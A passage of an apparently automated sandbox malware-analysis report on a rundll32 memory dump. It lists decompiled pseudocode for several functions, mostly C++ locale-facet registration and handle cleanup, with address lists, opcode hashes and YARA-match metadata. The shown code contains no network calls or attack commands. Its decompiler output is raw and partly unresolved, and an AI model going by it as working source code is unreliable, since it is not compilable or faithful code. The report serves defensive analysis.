				 *((long long*)(_t64 + 0x90)) = _t61;
				if (_t61 != 0) goto 0x20593946;
				 *((long long*)(_t64 + 0x98)) = _t83;
				 *((long long*)(_t72 + 0x20)) = _t83;
				_v32 = _t61;
				_v24 = _t61;
				_v16 = _t83;
				r9d = 0;
				 *((intOrPtr*)(_t90 + 0x28))();
				if ( *((intOrPtr*)(_t64 + 0x90)) != 0) goto 0x20593923;
				DeleteCriticalSection(??);
				if ( *((intOrPtr*)(_t64 + 0x50)) == 0) goto 0x20593994;
				CloseHandle(??);
				if ( *((intOrPtr*)(_t64 + 0x48)) == 0) goto 0x205939b6;
				CloseHandle(??);
				E00000215215205F51EC(_t61, _t64, _t83);
				if ( *((intOrPtr*)(_t64 + 0x28)) == 0) goto 0x205939c6;
				_t43 = CloseHandle(??);
				 *_t64 = 0x2063c108;
				return _t43;
			}














                0x21520593880
                0x21520593880
                0x21520593880
                0x2152059388a
                0x21520593893
                0x21520593898
                0x2152059389d
                0x215205938a7
                0x215205938b3
                0x215205938b5
                0x215205938c2
                0x215205938d2
                0x215205938d8
                0x215205938e5
                0x215205938eb
                0x215205938fc
                0x21520593902
                0x21520593911
                0x21520593917
                0x21520593921
                0x21520593923
                0x2152059392d
                0x2152059392f
                0x21520593933
                0x2152059393d
                0x2152059393f
                0x21520593946
                0x2152059394c
                0x21520593951
                0x21520593956
                0x2152059395b
                0x21520593968
                0x21520593977
                0x2152059397d
                0x2152059398b
                0x2152059398d
                0x2152059399b
                0x215205939a1
                0x215205939b0
                0x215205939bd
                0x215205939bf
                0x215205939cd
                0x215205939df

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandle$CompletionCriticalDeleteErrorLastMultipleObjectsPostQueuedSectionStatusTerminateThreadWait
                • String ID:
                • API String ID: 1875059124-0
                • Opcode ID: 9aea386166b5a77ba1eca5725480e87a77fe02e2db2055f8ce1ef71ba19c9fa2
                • Instruction ID: eb6681d5b180920487ee90998bde958ae0cc8a8de70ca8e6ee72916d3df78fa0
                • Opcode Fuzzy Hash: 9aea386166b5a77ba1eca5725480e87a77fe02e2db2055f8ce1ef71ba19c9fa2
                • Instruction Fuzzy Hash: 5D41AB33302F64C5EB649F21E498B9963A0FB96F94F185165AE8D07B9CCF38D455C740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205DA404 Relevance: 9.1, APIs: 6, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 62%
                			E00000215215205DA404(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				intOrPtr _t26;
				void* _t29;
				void* _t37;
				void* _t44;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t57;
				signed long long _t58;
				intOrPtr _t65;
				intOrPtr* _t79;
				long long _t80;
				void* _t81;

				_t52 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t81 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t80 =  *0x20681c60; // 0x0
				_a24 = _t80;
				_t57 =  *0x20681ba0; // 0x0
				if (_t57 != 0) goto 0x205da47f;
				E00000215215205D19DC(0,  &_a8);
				_t44 =  *0x20681ba0 - _t57; // 0x0
				if (_t44 != 0) goto 0x205da46e;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681ba0 = _t52;
				_t29 = E00000215215205D1A5C(_t52,  &_a8);
				_t58 =  *0x20681ba0; // 0x0
				_t65 = _a8;
				if (_t58 -  *((intOrPtr*)(_t65 + 0x18)) >= 0) goto 0x205da493;
				_t53 =  *((intOrPtr*)(_t65 + 0x10));
				goto 0x205da495;
				if ( *((intOrPtr*)(_t53 + _t58 * 8)) != 0) goto 0x205da522;
				if ( *((intOrPtr*)(_t65 + 0x24)) == dil) goto 0x205da4bb;
				E00000215215205D6CC0(_t29);
				if (_t58 -  *((intOrPtr*)(_t53 + 0x18)) >= 0) goto 0x205da4b9;
				_t54 =  *((intOrPtr*)(_t53 + 0x10));
				goto 0x205da4bb;
				if ( *((intOrPtr*)(_t54 + _t58 * 8)) != 0) goto 0x205da522;
				if (_t80 == 0) goto 0x205da4ca;
				goto 0x205da522;
				E00000215215205DCC50(_t37, 0, 0, _t58,  &_a24, _t81);
				if (_t54 != 0xffffffff) goto 0x205da4f9;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t58,  &_v48, 0x2066bb90, _t80);
				asm("int3");
				_t79 = _a24;
				 *0x20681c60 = _t79;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t79 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t54, _t79),  &_a16);
			}



















                0x215205da404
                0x215205da40c
                0x215205da415
                0x215205da41a
                0x215205da424
                0x215205da42a
                0x215205da431
                0x215205da436
                0x215205da440
                0x215205da449
                0x215205da44e
                0x215205da455
                0x215205da457
                0x215205da45f
                0x215205da467
                0x215205da473
                0x215205da478
                0x215205da47f
                0x215205da487
                0x215205da489
                0x215205da491
                0x215205da498
                0x215205da4a2
                0x215205da4a4
                0x215205da4ad
                0x215205da4af
                0x215205da4b7
                0x215205da4be
                0x215205da4c3
                0x215205da4c8
                0x215205da4d2
                0x215205da4db
                0x215205da4e2
                0x215205da4f3
                0x215205da4f8
                0x215205da4f9
                0x215205da4fe
                0x215205da50f
                0x215205da517
                0x215205da53b

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow
                • String ID:
                • API String ID: 1824299764-0
                • Opcode ID: 01a8b33dcf410191560d6fd8069a20cb0a9b66b3e31510c19544a4033c5b5795
                • Instruction ID: 13086f2d0c6575678efdfacfe3bad8bd8d61e327e041713ada38de25ef1ca1a6
                • Opcode Fuzzy Hash: 01a8b33dcf410191560d6fd8069a20cb0a9b66b3e31510c19544a4033c5b5795
                • Instruction Fuzzy Hash: 5D313D37706E24C1EE219B15E5582EA6365EBE47E0F580292AE5D077EDDE38D847C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205DA53C Relevance: 9.1, APIs: 6, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 62%
                			E00000215215205DA53C(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				intOrPtr _t26;
				void* _t29;
				void* _t37;
				void* _t44;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t57;
				signed long long _t58;
				intOrPtr _t65;
				intOrPtr* _t79;
				long long _t80;
				void* _t81;

				_t52 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t81 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t80 =  *0x20681c00; // 0x0
				_a24 = _t80;
				_t57 =  *0x20681b50; // 0x0
				if (_t57 != 0) goto 0x205da5b7;
				E00000215215205D19DC(0,  &_a8);
				_t44 =  *0x20681b50 - _t57; // 0x0
				if (_t44 != 0) goto 0x205da5a6;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681b50 = _t52;
				_t29 = E00000215215205D1A5C(_t52,  &_a8);
				_t58 =  *0x20681b50; // 0x0
				_t65 = _a8;
				if (_t58 -  *((intOrPtr*)(_t65 + 0x18)) >= 0) goto 0x205da5cb;
				_t53 =  *((intOrPtr*)(_t65 + 0x10));
				goto 0x205da5cd;
				if ( *((intOrPtr*)(_t53 + _t58 * 8)) != 0) goto 0x205da65a;
				if ( *((intOrPtr*)(_t65 + 0x24)) == dil) goto 0x205da5f3;
				E00000215215205D6CC0(_t29);
				if (_t58 -  *((intOrPtr*)(_t53 + 0x18)) >= 0) goto 0x205da5f1;
				_t54 =  *((intOrPtr*)(_t53 + 0x10));
				goto 0x205da5f3;
				if ( *((intOrPtr*)(_t54 + _t58 * 8)) != 0) goto 0x205da65a;
				if (_t80 == 0) goto 0x205da602;
				goto 0x205da65a;
				E00000215215205DCD1C(_t37, 0, 0, _t58,  &_a24, _t81);
				if (_t54 != 0xffffffff) goto 0x205da631;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t58,  &_v48, 0x2066bb90, _t80);
				asm("int3");
				_t79 = _a24;
				 *0x20681c00 = _t79;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t79 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t54, _t79),  &_a16);
			}



















                0x215205da53c
                0x215205da544
                0x215205da54d
                0x215205da552
                0x215205da55c
                0x215205da562
                0x215205da569
                0x215205da56e
                0x215205da578
                0x215205da581
                0x215205da586
                0x215205da58d
                0x215205da58f
                0x215205da597
                0x215205da59f
                0x215205da5ab
                0x215205da5b0
                0x215205da5b7
                0x215205da5bf
                0x215205da5c1
                0x215205da5c9
                0x215205da5d0
                0x215205da5da
                0x215205da5dc
                0x215205da5e5
                0x215205da5e7
                0x215205da5ef
                0x215205da5f6
                0x215205da5fb
                0x215205da600
                0x215205da60a
                0x215205da613
                0x215205da61a
                0x215205da62b
                0x215205da630
                0x215205da631
                0x215205da636
                0x215205da647
                0x215205da64f
                0x215205da673

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow
                • String ID:
                • API String ID: 1824299764-0
                • Opcode ID: e24144342c1bc669cb41d6023af797a8479b99192c235ba69f0a6108fed272c7
                • Instruction ID: f066f39150292b75280eca8023bb408e5eaa4b2f6dd732956917ae1ac1c445fc
                • Opcode Fuzzy Hash: e24144342c1bc669cb41d6023af797a8479b99192c235ba69f0a6108fed272c7
                • Instruction Fuzzy Hash: B8315C37706E60C1EE219B15E5582DA6365EBE47E0F180292EE6D076EDDF38D4438700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205DA674 Relevance: 9.1, APIs: 6, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 59%
                			E00000215215205DA674(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				void* __rbp;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t79 =  *0x20681c68; // 0x0
				_a24 = _t79;
				_t56 =  *0x20681ba8; // 0x0
				if (_t56 != 0) goto 0x205da6ef;
				E00000215215205D19DC(0,  &_a8);
				_t43 =  *0x20681ba8 - _t56; // 0x0
				if (_t43 != 0) goto 0x205da6de;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681ba8 = _t51;
				_t29 = E00000215215205D1A5C(_t51,  &_a8);
				_t57 =  *0x20681ba8; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205da703;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0x205da705;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205da792;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205da72b;
				E00000215215205D6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205da729;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0x205da72b;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205da792;
				if (_t79 == 0) goto 0x205da73a;
				goto 0x205da792;
				E00000215215205DCDE8(0, 0, _t57,  &_a24, _t80, _t79, _t80);
				if (_t53 != 0xffffffff) goto 0x205da769;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0x20681c68 = _t78;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
			}



















                0x215205da674
                0x215205da67c
                0x215205da685
                0x215205da68a
                0x215205da694
                0x215205da69a
                0x215205da6a1
                0x215205da6a6
                0x215205da6b0
                0x215205da6b9
                0x215205da6be
                0x215205da6c5
                0x215205da6c7
                0x215205da6cf
                0x215205da6d7
                0x215205da6e3
                0x215205da6e8
                0x215205da6ef
                0x215205da6f7
                0x215205da6f9
                0x215205da701
                0x215205da708
                0x215205da712
                0x215205da714
                0x215205da71d
                0x215205da71f
                0x215205da727
                0x215205da72e
                0x215205da733
                0x215205da738
                0x215205da742
                0x215205da74b
                0x215205da752
                0x215205da763
                0x215205da768
                0x215205da769
                0x215205da76e
                0x215205da77f
                0x215205da787
                0x215205da7ab

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow
                • String ID:
                • API String ID: 1824299764-0
                • Opcode ID: 4991f436fa3c4e32b2136a0073de4f2a818d2aa20e97c2aecb14420ceab6e43e
                • Instruction ID: f12f3caa5d174b89c6af5b0821c046eb6ca97f469e3b3177333ddc62fce3599b
                • Opcode Fuzzy Hash: 4991f436fa3c4e32b2136a0073de4f2a818d2aa20e97c2aecb14420ceab6e43e
                • Instruction Fuzzy Hash: A8314E37706E20D5EA21AB25E5582EA6365EBE47E0F284293EE5D077EDDE34D443C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205DA7AC Relevance: 9.1, APIs: 6, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 59%
                			E00000215215205DA7AC(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				void* __rbp;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t79 =  *0x20681c08; // 0x0
				_a24 = _t79;
				_t56 =  *0x20681b00; // 0x0
				if (_t56 != 0) goto 0x205da827;
				E00000215215205D19DC(0,  &_a8);
				_t43 =  *0x20681b00 - _t56; // 0x0
				if (_t43 != 0) goto 0x205da816;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681b00 = _t51;
				_t29 = E00000215215205D1A5C(_t51,  &_a8);
				_t57 =  *0x20681b00; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205da83b;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0x205da83d;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205da8ca;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205da863;
				E00000215215205D6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205da861;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0x205da863;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205da8ca;
				if (_t79 == 0) goto 0x205da872;
				goto 0x205da8ca;
				E00000215215205DCEE0(0, 0, _t57,  &_a24, _t80, _t79, _t80);
				if (_t53 != 0xffffffff) goto 0x205da8a1;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0x20681c08 = _t78;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
			}



















                0x215205da7ac
                0x215205da7b4
                0x215205da7bd
                0x215205da7c2
                0x215205da7cc
                0x215205da7d2
                0x215205da7d9
                0x215205da7de
                0x215205da7e8
                0x215205da7f1
                0x215205da7f6
                0x215205da7fd
                0x215205da7ff
                0x215205da807
                0x215205da80f
                0x215205da81b
                0x215205da820
                0x215205da827
                0x215205da82f
                0x215205da831
                0x215205da839
                0x215205da840
                0x215205da84a
                0x215205da84c
                0x215205da855
                0x215205da857
                0x215205da85f
                0x215205da866
                0x215205da86b
                0x215205da870
                0x215205da87a
                0x215205da883
                0x215205da88a
                0x215205da89b
                0x215205da8a0
                0x215205da8a1
                0x215205da8a6
                0x215205da8b7
                0x215205da8bf
                0x215205da8e3

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow
                • String ID:
                • API String ID: 1824299764-0
                • Opcode ID: 014138412515c7b3edb4f7246281995acaddc5a7eadf6c72d55ebe91536a86d5
                • Instruction ID: cce2f7a808f4934dbb8ef6bb3c321a3cefa2afe5e4ac8ae1ac0d8384e4cfbd20
                • Opcode Fuzzy Hash: 014138412515c7b3edb4f7246281995acaddc5a7eadf6c72d55ebe91536a86d5
                • Instruction Fuzzy Hash: 4B314C37706E20C1FA219B26E5582E96365EBE4BE0F184292EE5D476EDDE38D8438700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205EED84 Relevance: 9.1, APIs: 6, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 62%
                			E00000215215205EED84(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				intOrPtr _t26;
				void* _t29;
				void* _t37;
				void* _t44;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t57;
				signed long long _t58;
				intOrPtr _t65;
				intOrPtr* _t79;
				long long _t80;
				void* _t81;

				_t52 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t81 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t80 =  *0x20681ce8; // 0x0
				_a24 = _t80;
				_t57 =  *0x20681ca8; // 0x0
				if (_t57 != 0) goto 0x205eedff;
				E00000215215205D19DC(0,  &_a8);
				_t44 =  *0x20681ca8 - _t57; // 0x0
				if (_t44 != 0) goto 0x205eedee;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681ca8 = _t52;
				_t29 = E00000215215205D1A5C(_t52,  &_a8);
				_t58 =  *0x20681ca8; // 0x0
				_t65 = _a8;
				if (_t58 -  *((intOrPtr*)(_t65 + 0x18)) >= 0) goto 0x205eee13;
				_t53 =  *((intOrPtr*)(_t65 + 0x10));
				goto 0x205eee15;
				if ( *((intOrPtr*)(_t53 + _t58 * 8)) != 0) goto 0x205eeea2;
				if ( *((intOrPtr*)(_t65 + 0x24)) == dil) goto 0x205eee3b;
				E00000215215205D6CC0(_t29);
				if (_t58 -  *((intOrPtr*)(_t53 + 0x18)) >= 0) goto 0x205eee39;
				_t54 =  *((intOrPtr*)(_t53 + 0x10));
				goto 0x205eee3b;
				if ( *((intOrPtr*)(_t54 + _t58 * 8)) != 0) goto 0x205eeea2;
				if (_t80 == 0) goto 0x205eee4a;
				goto 0x205eeea2;
				E00000215215205EF680(_t37, 0, 0, _t58,  &_a24, _t81);
				if (_t54 != 0xffffffff) goto 0x205eee79;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t58,  &_v48, 0x2066bb90, _t80);
				asm("int3");
				_t79 = _a24;
				 *0x20681ce8 = _t79;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t79 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t54, _t79),  &_a16);
			}



















                0x215205eed84
                0x215205eed8c
                0x215205eed95
                0x215205eed9a
                0x215205eeda4
                0x215205eedaa
                0x215205eedb1
                0x215205eedb6
                0x215205eedc0
                0x215205eedc9
                0x215205eedce
                0x215205eedd5
                0x215205eedd7
                0x215205eeddf
                0x215205eede7
                0x215205eedf3
                0x215205eedf8
                0x215205eedff
                0x215205eee07
                0x215205eee09
                0x215205eee11
                0x215205eee18
                0x215205eee22
                0x215205eee24
                0x215205eee2d
                0x215205eee2f
                0x215205eee37
                0x215205eee3e
                0x215205eee43
                0x215205eee48
                0x215205eee52
                0x215205eee5b
                0x215205eee62
                0x215205eee73
                0x215205eee78
                0x215205eee79
                0x215205eee7e
                0x215205eee8f
                0x215205eee97
                0x215205eeebb

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow
                • String ID:
                • API String ID: 1824299764-0
                • Opcode ID: 1b6f675c97c9b95ccee983e377406c231770fe02692c3ba2a5b7a75e57c626db
                • Instruction ID: eb8d0dd0027715c155a35e547dc2e530616a315b090c5fc2c0135ad9c11fc8d0
                • Opcode Fuzzy Hash: 1b6f675c97c9b95ccee983e377406c231770fe02692c3ba2a5b7a75e57c626db
                • Instruction Fuzzy Hash: D0315033716E20D1EB219B16E9582D96365EFE47E0F280296DE9D077EDDE38D8468700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205EEEBC Relevance: 9.1, APIs: 6, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 59%
                			E00000215215205EEEBC(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				void* __rbp;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t79 =  *0x20681cf0; // 0x0
				_a24 = _t79;
				_t56 =  *0x20681cb0; // 0x0
				if (_t56 != 0) goto 0x205eef37;
				E00000215215205D19DC(0,  &_a8);
				_t43 =  *0x20681cb0 - _t56; // 0x0
				if (_t43 != 0) goto 0x205eef26;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681cb0 = _t51;
				_t29 = E00000215215205D1A5C(_t51,  &_a8);
				_t57 =  *0x20681cb0; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205eef4b;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0x205eef4d;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205eefda;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205eef73;
				E00000215215205D6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205eef71;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0x205eef73;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205eefda;
				if (_t79 == 0) goto 0x205eef82;
				goto 0x205eefda;
				E00000215215205EF74C(0, 0, _t57,  &_a24, _t80, _t79, _t80);
				if (_t53 != 0xffffffff) goto 0x205eefb1;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0x20681cf0 = _t78;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
			}



















                0x215205eeebc
                0x215205eeec4
                0x215205eeecd
                0x215205eeed2
                0x215205eeedc
                0x215205eeee2
                0x215205eeee9
                0x215205eeeee
                0x215205eeef8
                0x215205eef01
                0x215205eef06
                0x215205eef0d
                0x215205eef0f
                0x215205eef17
                0x215205eef1f
                0x215205eef2b
                0x215205eef30
                0x215205eef37
                0x215205eef3f
                0x215205eef41
                0x215205eef49
                0x215205eef50
                0x215205eef5a
                0x215205eef5c
                0x215205eef65
                0x215205eef67
                0x215205eef6f
                0x215205eef76
                0x215205eef7b
                0x215205eef80
                0x215205eef8a
                0x215205eef93
                0x215205eef9a
                0x215205eefab
                0x215205eefb0
                0x215205eefb1
                0x215205eefb6
                0x215205eefc7
                0x215205eefcf
                0x215205eeff3

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow
                • String ID:
                • API String ID: 1824299764-0
                • Opcode ID: f43d10d2897e83d3bc7a87f3a56ab67e3edf265f2d0c7023e32dc3d5bba168d6
                • Instruction ID: 5ce2a349a2f2a5eecba81c7bb8c6940ab105966908293fc35f2a00f55f282faf
                • Opcode Fuzzy Hash: f43d10d2897e83d3bc7a87f3a56ab67e3edf265f2d0c7023e32dc3d5bba168d6
                • Instruction Fuzzy Hash: AB318D33316E60C1EA219B15E5582E96365EFF4BE0F280292EEAD477EDDF38D4528700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205F6B70 Relevance: 9.1, APIs: 6, Instructions: 67COMMON
                Download Yara Rule
                C-Code - Quality: 55%
                			E00000215215205F6B70(long long* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, void* __r8, char _a8, long long _a16, long long _a24) {
				long long _v16;
				long long _v32;
				intOrPtr _v40;
				void* __rdi;
				intOrPtr _t22;
				long long* _t39;
				intOrPtr* _t41;
				long long _t44;
				intOrPtr* _t59;
				intOrPtr _t67;
				intOrPtr _t68;

				_t46 = __rcx;
				_t39 = __rax;
				_a8 = __rcx;
				_v32 = 0xfffffffe;
				_a16 = __rbx;
				_a24 = __rsi;
				_t44 = __rcx;
				_v40 = 0;
				E00000215215205D6CC8(1, __rcx, __rsi, __r8);
				_t59 = _t39;
				_v16 = _t39;
				E00000215215205F4DCC(_t39, _t46);
				_t61 = _t39;
				_a8 = _t39;
				E00000215215205B76B0(0, _t44, _t39, _t59);
				 *_t39 = 0x2062f5c0;
				E00000215215205D6EBC(0x2062f5c0, _t59);
				 *((long long*)(_t44 + 8)) = 0x2062f5c0;
				_t67 =  *0x20681950; // 0x0
				if (_t67 != 0) goto 0x205f6c23;
				E00000215215205D19DC(0,  &_a8);
				if ( *0x20681950 != 0) goto 0x205f6c12;
				_t22 =  *0x20681908; // 0x0
				 *0x20681908 = _t22 + 1;
				 *0x20681950 = 0x2062f5c0;
				E00000215215205D1A5C(0x2062f5c0,  &_a8);
				_t68 =  *0x20681950; // 0x0
				E00000215215205D48B8(_t44,  *((intOrPtr*)(_t44 + 8)), _t39, _t39, _t68);
				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 8)) + 0x20)) = 0;
				E00000215215205BB6E0(0x2062f5c0, _t44,  *((intOrPtr*)(_t44 + 8)) + 0x28, "*", _t61);
				if (_t59 == 0) goto 0x205f6c6d;
				_t41 =  *_t59;
				 *((intOrPtr*)(_t41 + 0x10))();
				if (_t41 == 0) goto 0x205f6c6d;
				return  *((intOrPtr*)( *_t41))();
			}














                0x215205f6b70
                0x215205f6b70
                0x215205f6b70
                0x215205f6b7a
                0x215205f6b83
                0x215205f6b88
                0x215205f6b8d
                0x215205f6b90
                0x215205f6b9a
                0x215205f6b9f
                0x215205f6ba2
                0x215205f6bac
                0x215205f6bb1
                0x215205f6bb4
                0x215205f6bbe
                0x215205f6bca
                0x215205f6bd0
                0x215205f6bd5
                0x215205f6bd9
                0x215205f6be3
                0x215205f6bec
                0x215205f6bf9
                0x215205f6bfb
                0x215205f6c03
                0x215205f6c0b
                0x215205f6c17
